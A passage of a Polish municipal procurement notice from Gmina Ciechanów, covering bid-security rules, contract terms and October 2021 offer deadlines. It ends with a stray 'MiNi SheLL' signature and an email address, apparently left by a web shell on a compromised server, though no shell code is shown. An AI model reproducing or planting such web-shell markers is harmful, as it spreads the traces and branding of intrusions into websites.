jakiego Wykonawcy<br/> wnoszone jest wadium.<br/> . w poręczeniach bankowych, poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-<br/> kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach<br/> udzielanych przez podmiot o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada<br/> 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U.<br/> z 2016 r. poz. 359) – składane w oryginale w kasie Urzędu Gminy Ciechanów za<br/> potwierdzeniem przyjęcia pod upływem terminu składania ofert lub załączane do oferty<br/> (tj. w kopercie z ofertą, w takim przypadku zamawiający przekaże oryginał dokumentu <br/> stanowiącego wadium do kasy).<br/> W przypadku załączenia dokumentu do koperty zawierającej ofertę należy pamiętać, aby<br/> nie spinać ww. dokumentu z ofertą i nie numerować go jak kolejnej strony tej oferty!<br/> Dokument ten bowiem ma zapewniać możliwość swobodnego przekazania do kasy, bez<br/> konieczności naruszania integralności samej oferty;…………………………………….<br/> Dopuszczalne jest złożenie wadium w więcej niż jednej formie.<br/> Właściwa kasa Urzędu Gminy Ciechanów znajduje się w budynku adres: .Urząd<br/> Gminy Ciechanów ul. Fabryczna 8 <br/> na parterze – jest czynna do poniedziałku do piątku w godzinach 8 do <br/><br/> Kasa potwierdza jedynie przyjęcie dokumenty stanowiącego wadium nie zajmuje się oceną,<br/> czy spełnia ona wymagania Zamawiającego.<br/><br/> Wymagania dotyczące wnoszenia wadium , przechowywania , zwrotu<br/> Będą się odbywać na podstawie art.97-98 ustawy PZP <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> koniecznośćwykonania prac nie ujętych w projekcie po cenach z przetargu <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy przetargowej Gminy Ciechanów www.gminaciechanow.-bip-przetargi wg nowej ustawy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com